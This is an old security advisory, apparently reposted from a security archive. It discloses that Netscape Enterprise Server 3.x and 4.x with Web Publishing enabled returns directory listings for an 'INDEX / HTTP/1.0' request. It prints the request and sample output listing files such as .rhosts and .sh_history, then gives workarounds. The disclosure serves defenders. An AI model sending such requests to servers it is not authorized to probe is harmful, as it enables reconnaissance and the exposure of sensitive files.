S.A.F.E.R. Security Bulletin 010124.EXP.1.11 - Netscape Enterprise Server 3.x and 4.x allows remote users to obtain directory listings on remote sites running web publishing by sending the command "INDEX / HTTP/1.0".
0c07af4b20cd0f80c350f290f2165288d37e8000439245b0aa663dc85df5e127__________________________________________________________
S.A.F.E.R. Security Bulletin 010124.EXP.1.11
__________________________________________________________
TITLE : Netscape Enterprise Server - INDEX request problem
DATE : January 24, 2001
NATURE : Information gathering
AFFECTED : Netscape Enterprise Server 3.x and 4.x with Web Publishing enabled
PROBLEM:
Problems exists that allows remote user to obtain directory listings on remote site running Web Publishing.
DETAILS:
It is possible to obtain directory listing on the remote web server by issuing command:
INDEX / HTTP/1.0
Output looks like:
-- output start --
Trying 192.168.1.1...
Connected to www.example.org.
Escape character is '^]'.
INDEX / HTTP/1.0
HTTP/1.1 200 OK
Server: Netscape-Enterprise/3.6 SP2
Date: Fri, 19 Jan 2001 12:37:26 GMT
Content-type: text/plain
test directory 512 979859452 0 null null
contact directory 512 979701766 0 null null
index.html text/html 1467 979701461 268 null null
mobile directory 512 979701775 0 null null
service directory 512 979701801 0 null null
.rhosts unknown 22 965727716 264 null null
search directory 512 931316908 0 null null
.sh_history unknown 1256 979723453 264 null null
corporate directory 512 972989267 0 null null
.cshrc unknown 418 975657629 264 null null
.login unknown 674 975657629 264 null null
.profile unknown 416 975657629 264 null null
-- output end --
INDEX request will not work on 'aliased' directories (like CGI directories and similar).
FIXES:
Netscape has been contacted on multiple occasions. First time, more than a year ago. Although other problems we have reported have been fixed, we
have received no response for this issue - to date.
Workaround is to disable Web Publishing, or disable INDEX request (which will, most likely, break web publishing feature).
CREDITS:
Emmanuel Gadaix <emmanuel@relaygroup.com>
Vanja Hrustic <vanja@relaygroup.com>
Fyodor Yarochkin <fyodor@relaygroup.com>
This advisory is also available at https://www.safermag.com/advisories/
__________________________________________________________
S.A.F.E.R. - Security Alert For Enterprise Resources
Copyright (c) 2001 The Relay Group
https://www.safermag.com ---- security@relaygroup.com
__________________________________________________________
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed